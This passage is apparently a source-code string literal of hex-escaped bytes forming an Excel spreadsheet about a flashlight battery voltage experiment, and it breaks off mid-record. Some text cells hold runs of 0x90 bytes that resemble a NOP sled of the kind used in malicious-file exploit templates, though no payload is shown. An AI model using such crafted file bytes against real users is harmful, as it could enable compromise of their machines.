x00\x04\x00\x1B\x00\x03".\r\n"\x00\x23\x31\x39\x04\x02\x0B\x00\x04\x00\x05\x00\x1B\x00\x03\x00".\r\n"\x23\x32\x30\x01\x02\x06\x00\x04\x00\x06\x00\x1B\x00\x04\x02\x0B".\r\n"\x00\x04\x00\x07\x00\x1B\x00\x03\x00\x23\x33\x31\x04\x02\x0B\x00".\r\n"\x04\x00\x08\x00\x1B\x00\x03\x00\x23\x33\x32\xBE\x00\x0A\x00\x04".\r\n"\x00\x09\x00\x1B\x00\x1B\x00\x0A\x00\xBE\x00\x1C\x00\x05\x00\x00".\r\n"\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15".\r\n"\x00\x15\x00\x15\x00\x15\x00\x0A\x00\x04\x02\x13\x00\x06\x00\x00".\r\n"\x00\x16\x00\x0B\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x04\x02\x0F\x00\x06\x00\x01\x00\x16\x00\x07\x00\x90\x90\x90\x90".\r\n"\x90\x90\x90\x04\x02\x0F\x00\x06\x00\x02\x00\x16\x00\x07\x00\x90".\r\n"\x90\x90\x90\x90\x90\x90\x04\x02\x18\x00\x06\x00\x03\x00\x17\x00".\r\n"\x10\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x3F\x04\x02\x0F\x00\x06\x00\x04\x00\x16\x00\x07\x00\x90\x90".\r\n"\x90\x90\x90\x90\x90\x04\x02\x0F\x00\x06\x00\x05\x00\x16\x00\x07".\r\n"\x00\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x18\x00\x06\x00\x06\x00".\r\n"\x17\x00\x10\x00\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74\x20\x64".\r\n"\x65\x61\x64\x3F\x04\x02\x0F\x00\x06\x00\x07\x00\x16\x00\x07\x00".\r\n"\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x0F\x00\x06\x00\x08\x00\x16".\r\n"\x00\x07\x00\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x18\x00\x06\x00".\r\n"\x09\x00\x17\x00\x10\x00\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74".\r\n"\x20\x64\x65\x61\x64\x3F\x04\x02\x17\x00\x06\x00\x0A\x00\x18\x00".\r\n"\x0F\x00\x41\x76\x65\x72\x61\x67\x65\x20\x56\x6F\x6C\x74\x61\x67".\r\n"\x65\xBD\x00\x18\x00\x07\x00\x00\x00\x19\x00\x00\x00\x00\x00\x1A".\r\n"\x00\x01\x10\x64\x40\x1A\x00\x01\x20\x64\x40\x02\x00\x01\x02\x06".\r\n"\x00\x07\x00\x03\x00\x1A\x00\x03\x02\x0E\x00\x07\x00\x04\x00\x1A".\r\n"\x00\x83\xC0\xCA\xA1\x45\xB6\xF9\x3F\x03\x02\x0E\x00\x07\x00\x05".\r\n"\x00\x1A\x00\x58\x39\xB4\xC8\x76\xBE\xF9\x3F\x01\x02\x06\x00\x07".\r\n"\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x07\x00\x07\x00\x1A\x00\x44".\r\n"\x8B\x6C\xE7\xFB\xA9\xF9\x3F\x7E\x02\x0A\x00\x07\x00\x08\x00\x1A".\r\n"\x00\x01\x10\x64\x40\x01\x02\x06\x00\x07\x00\x09\x00\x1A\x00\x06".\r\n"\x00\x21\x00\x07\x00\x0A\x00\x1A\x00\xB5\x81\x4E\x1B\xE8\xB4\xF9".\r\n"\x3F\x00\x00\x1A\x00\x01\xFD\x0B\x00\x25\x07\xC0\x07\xC0\x01\x08".\r\n"\x42\x01\x05\x00\x7E\x02\x0A\x00\x08\x00\x00\x00\x19\x00\x00\x00".\r\n"\xE0\x3F\xBE\x00\x0C\x00\x08\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00".\r\n"\x03\x00\x03\x02\x0E\x00\x08\x00\x04\x00\x1A\x00\xBC\x74\x93\x18".\r\n"\x04\x56\xF6\x3F\x03\x02\x0E\x00\x08\x00\x05\x00\x1A\x00\x3B\xDF".\r\n"\x4F\x8D\x97\x6E\xF6\x3F\x01\x02\x06\x00\x08\x00\x06\x00\x1A\x00".\r\n"\x7E\x02\x0A\x00\x08\x00\x07\x00\x1A\x00\x01\x80\x61\x40\x03\x02".\r\n"\x0E\x00\x08\x00\x08\x00\x1A\x00\x64\x3B\xDF\x4F\x8D\x97\xF6\x3F".\r\n"\x01\x02\x06\x00\x08\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x08\x00".\r\n"\x0A\x00\x1A\x00\x71\x3D\x0A\xD7\xA3\x70\xF6\x3F\x08\x00\x07\x00".\r\n"\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBC\x04\x15\x00\x08\x00\x17".\r\n"\x00\x0A\x0A\x00\x10\x0B\x00\x2D\x00\xC0\x00\xC0\xF7\xFE\x42\x01".\r\n"\x05\x00\x7E\x02\x0A\x00\x09\x00\x00\x00\x19\x00\x00\x00\xF0\x3F".\r\n"\x03\x02\x0E\x00\x09\x00\x01\x00\x1A\x00\x19\x04\x56\x0E\x2D\xB2".\r\n"\xF5\x3F\x03\x02\x0E\x00\x09\x00\x02\x00\x1A\x00\x02\x2B\x87\x16".\r\n"\xD9\xCE\xF5\x3F\x01\x02\x06\x00\x09\x00\x03\x00\x1A\x00\x03\x02".\r\n"\x0E\x00\x09\x00\x04\x00\x1A\x00\xB0\x72\x68\x91\xED\x7C\xF5\x3F".\r\n"\x03\x02\x0E\x00\x09\x00\x05\x00\x1A\x00\x04\x56\x0E\x2D\xB2\x9D".\r\n"\xF5\x3F\x01\x02\x06\x00\x09\x00\x06\x00\x1A\x00\x03\x02\x0E\x00".\r\n"\x09\x00\x07\x00\x1A\x00\x44\x8B\x6C\xE7\xFB\xA9\xF5\x3F\x7E\x02".\r\n"\x0A\x00\x09\x00\x08\x00\x1A\x00\x01\x00\x61\x40\x01\x02\x06\x00".\r\n"\x09\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x09\x00\x0A\x00\x1A\x00".\r\n"\x79\xE9\x26\x31\x08\xAC\xF5\x3F\x08\x00\x08\x00\x0A\xFF\x05\x00".\r\n"\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0A\x00\x00\x00\x19\x00\x00".\r\n"\x00\xF8\x3F\xBE\x00\x0C\x00\x0A\x00\x01\x00\x1A\x00\x1A\x00\x1A".\r\n"\x00\x03\x00\x03\x02\x0E\x00\x0A\x00\x04\x00\x1A\x00\xB6\xF3\xFD".\r\n"\xD4\x78\xE9\xF4\x3F\x03\x02\x0E\x00\x0A\x00\x05\x00\x1A\x00\xA0".\r\n"\x1A\x2F\xDD\x24\x06\xF5\x3F\x01\x02\x06\x00\x0A\x00\x06\x00\x1A".\r\n"\x00\x03\x02\x0E\x00\x0A\x00\x07\x00\x1A\x00\x4A\x0C\x02\x2B\x87".\r\n"\x16\xF5\x3F\x03\x02\x0E\x00\x0A\x00\x08\x00\x1A\x00\x08\xAC\x1C".\r\n"\x5A\x64\x3B\xF5\x3F\x01\x02\x06\x00\x0A\x00\x09\x00\x1A\x00\x06".\r\n"\x00\x1B\x00\x0A\x00\x0A\x00\x1A\x00\xAA\xF1\xD2\x4D\x62\x10\xF5".\r\n"\x3F\x08\x00\x09\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00".\r\n"\x18\x00\x0B\x00\x00\x00\x19\x00\x00\x00\x00\x40\x1A\x00\x01\x41".\r\n"\x60\x40\x1A\x00\x01\x41\x60\x40\x02\x00\x01\x02\x06\x00\x0B\x00".\r\n"\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0B\x00\x04\x00\x1A\x00\x01\x00".\r\n"\x60\x40\x03\x02\x0E\x00\x0B\x00\x05\x00\x1A\x00\xCF\xF7\x53\xE3".\r\n"\xA5\x9B\xF4\x3F\x01\x02\x06\x00\x0B\x00\x06\x00\x1A\x00\x03\x02".\r\n"\x0E\x00\x0B\x00\x07\x00\x1A\x00\x77\xBE\x9F\x1A\x2F\xDD\xF4\x3F".\r\n"\x03\x02\x0E\x00\x0B\x00\x08\x00\x1A\x00\x60\xE5\xD0\x22\xDB\xF9".\r\n"\xF4\x3F\x01\x02\x06\x00\x0B\x00\x09\x00\x1A\x00\x06\x00\x1B\x00".\r\n"\x0B\x00\x0A\x00\x1A\x00\xEE\x7C\x3F\x35\x5E\xBA\xF4\x3F\x08\x00".\r\n"\x0A\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0C".\r\n"\x00\x00\x00\x19\x00\x00\x00\x04\x40\x03\x02\x0E\x00\x0C\x00\x01".\r\n"\x00\x1A\x00\x91\xED\x7C\x3F\x35\x5E\xF4\x3F\x7E\x02\x0A\x00\x0C".\r\n"\x00\x02\x00\x1A\x00\x01\x00\x60\x40\x01\x02\x06\x00\x0C\x00\x03".\r\n"\x00\x1A\x00\x03\x02\x0E\x00\x0C\x00\x04\x00\x1A\x00\x12\x83\xC0".\r\n"\xCA\xA1\x45\xF4\x3F\x03\x02\x0E\x00\x0C\x00\x05\x00\x1A\x00\x25".\r\n"\x06\x81\x95\x43\x8B\xF4\x3F\x01\x02\x06\x00\x0C\x00\x06\x00\x1A".\r\n"\x00\x03\x02\x0E\x00\x0C\x00\x07\x00\x1A\x00\x7D\x3F\x35\x5E\xBA".\r\n"\x49\xF4\x3F\x03\x02\x0E\x00\x0C\x00\x08\x00\x1A\x00\xA6\x9B\xC4".\r\n"\x20\xB0\x72\xF4\x3F\x01\x02\x06\x00\x0C\x00\x09\x00\x1A\x00\x06".\r\n"\x00\x1B\x00\x0C\x00\x0A\x00\x1A\x00\x67\x66\x66\x66\x66\x66\xF4".\r\n"\x3F\x08\x00\x0B\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00".\r\n"\x18\x00\x0D\x00\x00\x00\x19\x00\x00\x00\x08\x40\x1A\x00\x01\x80".\r\n"\x5F\x40\x1A\x00\x01\xA0\x5F\x40\x02\x00\x01\x02\x06\x00\x0D\x00".\r\n"\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0D\x00\x04\x00\x1A\x00\x01\x60".\r\n"\x5F\x40\x03\x02\x0E\x00\x0D\x00\x05\x00\x1A\x00\xFE\xD4\x78\xE9".\r\n"\x26\x31\xF4\x3F\x01\x02\x06\x00\x0D\x00\x06\x00\x1A\x00\x03\x02".\r\n"\x0E\x00\x0D\x00\x07\x00\x1A\x00\x93\x18\x04\x56\x0E\x2D\xF4\x3F".\r\n"\x03\x02\x0E\x00\x0D\x00\x08\x00\x1A\x00\x12\x83\xC0\xCA\xA1\x45".\r\n"\xF4\x3F\x01\x02\x06\x00\x0D\x00\x09\x00\x1A\x00\x06\x00\x1B\x00".\r\n"\x0D\x00\x0A\x00\x1A\x00\x30\x96\xFC\x62\xC9\x2F\xF4\x3F\x08\x00".\r\n"\x0C\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0E".\r\n"\x00\x00\x00\x19\x00\x00\x00\x0C\x40\x03\x02\x0E\x00\x0E\x00\x01".\r\n"\x00\x1A\x00\x96\x43\x8B\x6C\xE7\xFB\xF3\x3F\x03\x02\x0E\x00\x0E".\r\n"\x00\x02\x00\x1A\x00\x7F\x6A\xBC\x74\x93\x18\xF4\x3F\x01\x02\x06".\r\n"\x00\x0E\x00\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0E\x00\x04\x00\x1A".\r\n"\x00\x01\x20\x5F\x40\x03\x02\x0E\x00\x0E\x00\x05\x00\x1A\x00\xC1".\r\n"\xCA\xA1\x45\xB6\xF3\xF3\x3F\x01\x02\x06\x00\x0E\x00\x06\x00\x1A".\r\n"\x00\x03\x02\x0E\x00\x0E\x00\x07\x00\x1A\x00\xC1\xCA\xA1\x45\xB6".\r\n"\xF3\xF3\x3F\x03\x02\x0E\x00\x0E\x00\x08\x00\x1A\x00\xD5\x78\xE9".\r\n"\x26\x31\x08\xF4\x3F\x01\x02\x06\x00\x0E\x00\x09\x00\x1A\x00\x06".\r\n"\x00\x1B\x00\x0E\x00\x0A\x00\x1A\x00\x63\x82\x07\xF3\x44\xFD\xF3".\r\n"\x3F\x08\x00\x0D\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02".\r\n"\x0A\x00\x0F\x00\x00\x00\x19\x00\x00\x00\x10\x40\xBE\x00\x0C\x00".\r\n"\x0F\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00\x03\x00\x03\x02\x0E\x00".\r\n"\x0F\x00\x04\x00\x1A\x00\x04\x56\x0E\x2D\xB2\x9D\xF3\x3F\x03\x02".\r\n"\x0E\x00\x0F\x00\x05\x00\x1A\x00\x83\xC0\xCA\xA1\x45\xB6\xF3\x3F".\r\n"\x01\x02\x06\x00\x0F\x00\x06\x00\x1A\x00\x7E\x02\x0A\x00\x0F\x00".\r\n"\x07\x00\x1A\x00\x01\xC0\x5E\x40\x03\x02\x0E\x00\x0F\x00\x08\x00".\r\n"\x1A\x00\x02\x2B\x87\x16\xD9\xCE\xF3\x3F\x01\x02\x06\x00\x0F\x00".\r\n"\x09\x00\x1A\x00\x06\x00\x1B\x00\x0F\x00\x0A\x00\x1A\x00\x4E\x62".\r\n"\x10\x58\x39\xB4\xF3\x3F\x08\x00\x0E\x00\x0A\xFF\x05\x00\x01\x08".\r\n"\x00\x0A\x00\x7E\x02\x0A\x00\x10\x00\x00\x00\x19\x00\x00\x00\x12".\r\n"\x40\x03\x02\x0E\x00\x10\x00\x01\x00\x1A\x00\xF0\xA7\xC6\x4B\x37".\r\n"\x89\xF3\x3F\x03\x02\x0E\x00\x10\x00\x02\x00\x1A\x00\x04\x56\x0E".\r\n"\x2D\xB2\x9D\xF3\x3F\x01\x02\x06\x00\x10\x00\x03\x00\x1A\x00\x03".\r\n"\x02\x0E\x00\x10\x00\x04\x00\x1A\x00\xB2\x9D\xEF\xA7\xC6\x4B\xF3".\r\n"\x3F\x03\x02\x0E\x00\x10\x00\x05\x00\x1A\x00\xDB\xF9\x7E\x6A\xBC".\r\n"\x74\xF3\x3F\x01\x02\x06\x00\x10\x00\x06\x00\x1A\x00\x03\x02\x0E".\r\n"\x00\x10\x00\x07\x00\x1A\x00\x31\x08\xAC\x1C\x5A\x64\xF3\x3F\x03".\r\n"\x02\x0E\x00\x10\x00\x08\x00\x1A\x00\x2F\xDD\x24\x06\x81\x95\xF3".\r\n"\x3F\x01\x02\x06\x00\x10\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x10".\r\n"\x00\x0A\x00\x1A\x00\x7B\x14\xAE\x47\xE1\x7A\xF3\x3F\x08\x00\x0F".\r\n"\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x11\x00".\r\n"\x00\x00\x19\x00\x00\x00\x14\x40\xBE\x00\x0C\x00\x11\x00\x01\x00".\r\n"\x1A\x00\x1A\x00\x1A\x00\x03\x00\x03\x02\x0E\x00\x11\x00\x04\x00".\r\n"\x1A\x00\xF4\xFD\xD4\x78\xE9\x26\xF3\x3F\x03\x02\x0E\x00\x11\x00".\r\n"\x05\x00\x1A\x00\xDD\x24\x06\x81\x95\x43\xF3\x3F\x01\x02\x06\x00".\r\n"\x11\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x11\x00\x07\x00\x1A\x00".\r\n"\x89\x41\x60\xE5\xD0\x22\xF3\x3F\x7E\x02\x0A\x00\x11\x00\x08\x00".\r\n"\x1A\x00\x01\x40\x5E\x40\x01\x02\x06\x00\x11\x00\x09\x00\x1A\x00".\r\n"\x06\x00\x1B\x00\x11\x00\x0A\x00\x1A\x00\xED\x7C\x3F\x35\x5E\x3A".\r\n"\xF3\x3F\x08\x00\x10\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD".\r\n"\x00\x12\x00\x12\x00\x00\x00\x19\x00\x00\x00\x16\x40\x1A\x00\x01".\r\n"\x00\x5D\x40\x01\x00\x03\x02\x0E\x00\x12\x00\x02\x00\x1A\x00\x60".\r\n"\xE5\xD0\x22\xDB\xF9\xF2\x3F\x01\x02\x06\x00\x12\x00\x03\x00\x1A".\r\n"\x00\x7E\x02\x0A\x00\x12\x00\x04\x00\x1A\x00\x01\x40\x5D\x40\x03".\r\n"\x02\x0E\x00\x12\x00\x05\x00\x1A\x00\x0C\x02\x2B\x87\x16\xD9\xF2".\r\n"\x3F\x01\x02\x06\x00\x12\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x12".\r\n"\x00\x07\x00\x1A\x00\xA2\x45\xB6\xF3\xFD\xD4\xF2\x3F\x7E\x02\x0A".\r\n"\x00\x12\x00\x08\x00\x1A\x00\x01\xC0\x5D\x40\x01\x02\x06\x00\x12".\r\n"\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x12\x00\x0A\x00\x1A\x00\x3B".\r\n"\x26\x78\x30\x4F\xD4\xF2\x3F\x08\x00\x11\x00\x0A\xFF\x05\x00\x01".\r\n"\x08\x00\x0A\x00\x7E\x02\x0A\x00\x13\x00\x00\x00\x19\x00\x00\x00".\r\n"\x18\x40\xBE\x00\x0C\x00\x13\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00".\r\n"\x03\x00\x03\x02\x0E\x00\x13\x00\x04\x00\x1A\x00\x3F\x35\x5E\xBA".\r\n"\x49\x0C\xF2\x3F\x7E\x02\x0A\x00\x41\x00\x05\x00\x1A\x00\x01\xC0".\r\n"\x5C\x40\x01\x02\x06\x00\x13\x00\x06\x00\x1A\x00\x03\x02\x0E\x00".\r\n"\x13\x00\x07\x00\x1A\x00\x62\x10\x58\x39\xB4\xC8\xF2\x3F\x03\x02".\r\n"\x0E\x00\x13\x00\x08\x00\x1A\x00\x8B\x6C\xE7\xFB\xA9\xF1\xF2\x3F".\r\n"\x01\x02\x06\x00\x13\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x13\x00".\r\n"\x0A\x00\x1A\x00\x24\x06\x81\x95\x43\x8B\xF2\x3F\x08\x00\x12\x00".\r\n"\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x14\x00\x00".\r\n"\x00\x19\x00\x00\x00\x1A\x40\x03\x02\x0E\x00\x14\x00\x01\x00\x1A".\r\n"\x00\xEE\x7C\x3F\x35\x5E\xBA\xF1\x3F\x7E\x02\x0A\x00\x14\x00\x02".\r\n"\x00\x1A\x00\x01\x60\x5C\x40\x01\x02\x06\x00\x14\x00\x03\x00\x1A".\r\n"\x00\x7E\x02\x0A\x00\x14\x00\x04\x00\x1A\x00\x01\x20\x5B\x40\x03".\r\n"\x02\x0E\x00\x14\x00\x05\x00\x1A\x00\xAC\x1C\x5A\x64\x3B\xDF\xF1".\r\n"\x3F\x01\x02\x06\x00\x14\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x14".\r\n"\x00\x07\x00\x1A\x00\xE9\x26\x31\x08\xAC\x1C\xF2\x3F\x03\x02\x0E".\r\n"\x00\x14\x00\x08\x00\x1A\x00\xE7\xFB\xA9\xF1\xD2\x4D\xF2\x3F\x01".\r\n"\x02\x06\x00\x14\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x14\x00\x0A".\r\n"\x00\x1A\x00\x53\x71\xF6\xE1\x33\xEC\xF1\x3F\x08\x00\x13\x00\x0A".\r\n"\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00\x18\x00\x15\x00\x00\x00".\r\n"\x19\x00\x00\x00\x1C\x40\x1A\x00\x01\x80\x4F\x40\x1A\x00\x01\x00".\r\n"\x5C\x40\x02\x00\x04\x02\x0B\x00\x15\x00\x03\x00\x1A\x00\x03\x00".\r\n"\x59\x65\x73\x03\x02\x0E\x00\x15\x00\x04\x00\x1A\x00\xFE\xD4\x78".\r\n"\xE9\x26\x31\xF0\x3F\x03\x02\x0E\x00\x15\x00\x05\x00\x1A\x00\x35".\r\n"\x5E\xBA\x49\x0C\x02\xF1\x3F\x01\x02\x06\x00\x15\x00\x06\x00\x1A".\r\n"\x00\x7E\x02\x0A\x00\x15\x00\x07\x00\x1A\x00\x00\x00\xF2\x3F\x03".\r\n"\x02\x0E\x00\x15\x00\x08\x00\x1A\x00\xFE\xD4\x78\xE9\x26\x31\xF2".\r\n"\x3F\x01\x02\x06\x00\x15\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x15".\r\n"\x00\x0A\x00\x1A\x00\x08\xAC\x1C\x5A\x64\x3B\xF0\x3F\x08\x00\x14".\r\n"\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x16\x00".\r\n"\x00\x00\x19\x00\x00\x00\x1E\x40\xBE\x00\x0C\x00\x16\x00\x01\x00".\r\n"\x1A\x00\x1A\x00\x1A\x00\x03\x00\x7E\x02\x0A\x00\x16\x00\x04\x00".\r\n"\x1A\x00\x01\xC0\x49\x40\x03\x02\x0E\x00\x16\x00\x05\x00\x1A\x00".\r\n"\x8D\x97\x6E\x12\x83\xC0\xE2\x3F\x04\x02\x0B\x00\x16\x00\x06\x00".\r\n"\x1A\x00\x03\x00\x59\x65\x73\x03\x02\x0E\x00\x16\x00\x07\x00\x1A".\r\n"\x00\x35\x5E\xBA\x49\x0C\x02\xF1\x3F\x7E\x02\x0A\x00\x16\x00\x08".\r\n"\x00\x1A\x00\x01\x60\x5B\x40\x01\x02\x06\x00\x16\x00\x09\x00\x1A".\r\n"\x00\x06\x00\x1B\x00\x16\x00\x0A\x00\x1A\x00\xDE\x4F\x8D\x97\x6E".\r\n"\x12\xEA\x3F\x08\x00\x15\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00".\r\n"\x7E\x02\x0A\x00\x17\x00\x00\x00\x19\x00\x00\x00\x20\x40\xBE\x00".\r\n"\x12\x00\x17\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00\x1A\x00\x1A\x00".\r\n"\x1A\x00\x06\x00\x03\x02\x0E\x00\x17\x00\x07\x00\x1A\x00\xB0\x72".\r\n"\x68\x91\xED\x7C\xE3\x3F\x7E\x02\x0A\x00\x17\x00\x08\x00\x1A\x00".\r\n"\x01\x80\x56\x40\x04\x02\x0B\x00\x17\x00\x09\x00\x1A\x00\x03\x00".\r\n"\x59\x65\x73\x06\x00\x1B\x00\x17\x00\x0A\x00\x1A\x00\xBE\x9F\x1A".\r\n"\x2F\xDD\x24\xE8\x3F\x08\x00\x16\x00\x0A\xFE\x05\x00\x01\x08\x00".\r\n"\x0A\x00\x04\x02\x46\x00\x19\x00\x00\x00\x0F\x00\x3E\x00\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x2E\x04\x02\x47\x00".\r\n"\x1A\x00\x00\x00\x0F\x00\x3F\x00\x56\x6F\x6C\x74\x61\x67\x65\x20".\r\n"\x28\x74\x68\x65\x20\x64\x65\x70\x65\x6E\x64\x65\x6E\x74\x20\x76".\r\n"\x61\x72\x69\x61\x62\x6C\x65\x29\x20\x69\x73\x20\x6F\x6E\x20\x74".\r\n"\x68\x65\x20\x79\x2D\x61\x78\x69\x73\x20\x6F\x66\x20\x74\x68\x65".\r\n"\x20\x67\x72\x61\x70\x68\x2E\xD7\x00\x34\x00\x24\x0F\x00\x00\xCC".\r\n"\x01\x2F\x00\x28\x00\x8F\x00\x20\x00\xF8\x00\xA3\x00\xAE\x00\xB3".\r\n"\x00\x99\x00\x9D\x00\xB3\x00\x9D\x00\xB3\x00\x95\x00\xB7\x00\x95".\r\n"\x00\xA5\x00\x95\x00\xAF\x00\xA2\x00\x96\x00\x72\x00\x4A\x00\x5D".\r\n"\x00\x3E\x00\x01\x00\x00\x00\x05\x00\x02\x00\x16\x06\x00\x00\x62".\r\n"\x00\x1B\x00\xDD\x00\x0A\x00\x9A\x03\x35\x00\xAF\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x09\x41\x01\x00\x40\x00\x01\x01\x00\x00\x08".\r\n"\x00\xC4\x39\x4C\x01\x04\x29\x7A\x01\x00\x00\x00\x00\x44\x28\x4C".\r\n"\x01\x09\x08\x08\x00\x00\x06\x20\x00\xAE\x21\xCD\x07\x14\x00\x00".\r\n"\x00\x15\x00\x00\x00\x83\x00\x02\x00\x00\x00\x84\x00\x02\x00\x00".\r\n"\x00\xA1\x00\x22\x00\x00\x00\x00\x00\x01\x00\x01\x00\x01\x00\x04".\r\n"\x00\x62\x00\x1B\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x3F\x00\x00\x33\x00\x02\x00\x03\x00\x12\x00\x02".\r\n"\x00\x00\x00\x16\x00\x02\x00\x01\x00\x17\x00\x02\x00\x01\x02\x01".\r\n"\x10\x02\x00\x00\x00\x02\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\xB0\xCC\xD5\x01\x28\x66\x55\x01\x33\x10\x00\x00\xA0\x00\x04".\r\n"\x00\x01\x00\x01\x00\x32\x10\x04\x00\x00\x00\x03\x00\x33\x10\x00".\r\n"\x00\x07\x10\x0A\x00\x00\x00\x00\x00\x05\x00\xFF\xFF\x08\x00\x0A".\r\n"\x10\x0C\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34".\r\n"\x10\x00\x00\x03\x10\x0C\x00\x01\x00\x01\x00\x11\x90\x11\x00\x00".\r\n"\x00\x00\x00\x33\x10\x00\x00\x51\x10\x08\x00\x00\x01\x00\x00\x00".\r\n"\x00\x00\x00\x0D\x10\x17\x00\x00\x00\x14\x45\x6E\x65\x72\x67\x69".\r\n"\x7A\x65\x72\x20\x28\x41\x6C\x6B\x61\x6C\x69\x6E\x65\x29\x51\x10".\r\n"\x1D\x00\x01\x02\x00\x00\xA5\x00\x15\x00\x3B\xFF\xFF\x00\x00\x00".\r\n"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x07\x00\x17\x00\x0A\x0A\x51".\r\n"\x10\x1D\x00\x02\x02\x00\x00\xA4\x00\x15\x00\x3B\xFF\xFF\x00\x00".\r\n"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x07\x00\x17\x00\x00\x00".\r\n"\x06\x10\x08\x00\xFF\xFF\x00\x00\x01\x00\x00\x00\x33\x10\x00\x00".\r\n"\x07\x10\x0A\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x0A\x10".\r\n"\x0C\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x01\x00\x01\x00\x0B\x10".\r\n"\x02\x00\x00\x00\x09\x10\x0C\x00\x00\x00\xFF\x00\x00\x00\xFF\x00".\r\n"\x08\x00\x00\x00\x34\x10\x00\x00\x45\x10\x02\x00\x00\x00\x34\x10".\r\n"\x00\x00\x44\x10\x04\x00\x0A\x00\x00\x00\x46\x10\x02\x00\x01\x00".\r\n"\x41\x10\x12\x00\x00\x00\x85\x02\x00\x00\x0A\x03\x00\x00\x49\x09".\r\n"\x00\x00\x2E\x09\x00\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00".\r\n"\x02\x00\x38\x01\x00\x00\x66\x02\x00\x00\x96\x0A\x00\x00\x9D\x0B".\r\n"\x00\x00\x1D\x10\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x33\x10\x00\x00\x20\x10\x08\x00".\r\n"\x01\x00\x01\x00\x01\x00\x01\x00\x1E\x10\x1A\x00\x02\x00\x03\x01".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x23\x00\x34\x10\x00\x00\x1D\x10\x12\x00\x01\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x33\x10\x00\x00\x1F\x10\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x1F\x01\x1E\x10\x1A\x00\x02\x00\x03\x01\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00".\r\n"\x21\x10\x02\x00\x01\x00\x07\x10\x0A\x00\x00\x00\x00\x00\x00\x00".\r\n"\xFF\xFF\x09\x00\x34\x10\x00\x00\x25\x10\x1A\x00\x02\x02\x01\x00".\r\n"\x00\x00\x00\x00\xA2\x04\x00\x00\x05\x0E\x00\x00\x0F\x05\x00\x00".\r\n"\x3D\x01\x00\x00\x81\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00".\r\n"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF9\x00\x00\x00\x2C\x00".\r\n"\x00\x00\x26\x10\x02\x00\x06\x00\x51\x10\x08\x00\x00\x01\x00\x00".\r\n"\x00\x00\x00\x00\x0D\x10\x17\x00\x00\x00\x14\x48\x6F\x75\x72\x73".\r\n"\x20\x6F\x66\x20\x62\x61\x74\x74\x65\x72\x79\x20\x75\x73\x65\x27".\r\n"\x10\x06\x00\